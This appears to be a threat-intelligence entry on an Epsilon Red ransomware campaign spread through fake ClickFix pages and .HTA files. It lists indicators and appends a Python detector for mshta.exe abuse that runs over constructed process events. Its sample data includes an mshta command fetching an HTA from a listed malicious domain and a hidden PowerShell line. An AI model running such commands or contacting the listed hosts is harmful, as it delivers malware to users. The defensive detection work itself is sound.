Threat Actors Lure Victims Into Downloading .HTA Files Using ClickFix To Spread Epsilon Red Ransomware
July 25, 2025, 12:37 p.m.
Description
A new Epsilon Red ransomware campaign has been discovered targeting users globally through fake ClickFix verification pages. Active since July 2025, the threat actors use social engineering and impersonate popular platforms such as Discord, Twitch, and OnlyFans to trick users into running malicious .HTA files, which use ActiveX to execute commands. This results in silent payload downloads and ransomware deployment. The campaign uses a ClickFix-themed malware delivery site that urges victims to visit a secondary page, where the malicious shell commands are executed. The attackers also impersonate various streaming services and use romance-themed lures. Epsilon Red, first observed in 2021, shows some similarity to REvil in its ransom note styling but appears distinct in its tactics and infrastructure.
Tags
Date
- Created: July 25, 2025, 10:29 a.m.
- Published: July 25, 2025, 10:29 a.m.
- Modified: July 25, 2025, 12:37 p.m.
Indicators
- e0a69439563c8534c2ef842d4ffcb16696f286d16585186de20351892f9917f1
- 213.209.150.188
- 155.94.155.227
- twtich.cc
- capchabot.cc
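Added example (not part of this entry or the original research): detection heuristics for the HTA delivery path described above, run over constructed process-creation events and matched against the indicators listed on this page. The indicator values are copied from the list above; the event records, file paths, and command lines are constructed for illustration, and the heuristics (mshta.exe pointed at a URL or .hta, a shell interpreter spawned by mshta.exe) are general mshta tradecraft assumptions rather than details taken from the page.

```python
"""ClickFix / .HTA delivery detection over Sysmon-style process events.

Added example. Events below are constructed, not real telemetry; the
IOC sets are the indicators listed on this page.
"""
import re
from dataclasses import dataclass

# Indicators copied from the page's Indicators list.
IOC_SHA256 = {"e0a69439563c8534c2ef842d4ffcb16696f286d16585186de20351892f9917f1"}
IOC_IPS = {"213.209.150.188", "155.94.155.227"}
IOC_DOMAINS = {"twtich.cc", "capchabot.cc"}

# Assumption (not from the page): interpreters an HTA typically launches
# through its ActiveX WScript.Shell object.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal Sysmon Event ID 1 shaped record (constructed)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    sha256: str = ""    # hash of the image, if the sensor provides it


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ioc_hits(ev: ProcessEvent) -> list[str]:
    """Return the page indicators that appear in the event."""
    hits = []
    text = ev.command_line.lower()
    hits += [d for d in IOC_DOMAINS if d in text]
    hits += [ip for ip in IOC_IPS if ip in text]
    if ev.sha256.lower() in IOC_SHA256:
        hits.append(ev.sha256.lower())
    return hits


def classify(ev: ProcessEvent) -> list[str]:
    """Return the detection labels that fire for one event."""
    labels = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line
    # 1. mshta.exe pointed at a remote URL or an .hta file: the lure stage.
    if img == "mshta.exe" and (URL_RE.search(cmd) or HTA_RE.search(cmd)):
        labels.append("mshta_remote_or_hta")
    # 2. A shell interpreter spawned by mshta.exe: the ActiveX execution
    #    path that runs the attacker's shell commands.
    if parent == "mshta.exe" and img in SHELL_CHILDREN:
        labels.append("mshta_spawns_shell")
    # 3. Direct match on a domain, IP or hash from this page.
    if ioc_hits(ev):
        labels.append("ioc_match")
    return labels


def scan(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, labels) for every event that triggered a label."""
    flagged = []
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            flagged.append((i, labels))
    return flagged


# Constructed sample events (not captured telemetry).
SAMPLE_EVENTS = [
    # Benign: user-launched browser.
    ProcessEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe",
                 r"C:\Windows\explorer.exe",
                 r'"C:\Program Files\Mozilla Firefox\firefox.exe"'),
    # Suspicious: mshta fetching an HTA from a page-listed domain
    # (the /verify.hta path is invented for the example).
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\explorer.exe",
                 r"mshta.exe https://capchabot.cc/verify.hta"),
    # Suspicious: the HTA's ActiveX object spawning a shell.
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\mshta.exe",
                 r"cmd.exe /c powershell -w hidden -c Get-Date"),
    # Benign: mshta with neither a URL nor an .hta argument.
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"mshta.exe about:blank"),
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(idx, basename(SAMPLE_EVENTS[idx].image), labels)
```

Labels 1 and 2 will also fire on legitimate HTA applications and on a user double-clicking a local .hta, so treat them as triage signals and escalate when they co-occur with an indicator match or with an unexpected parent such as explorer.exe launched from a Run dialog.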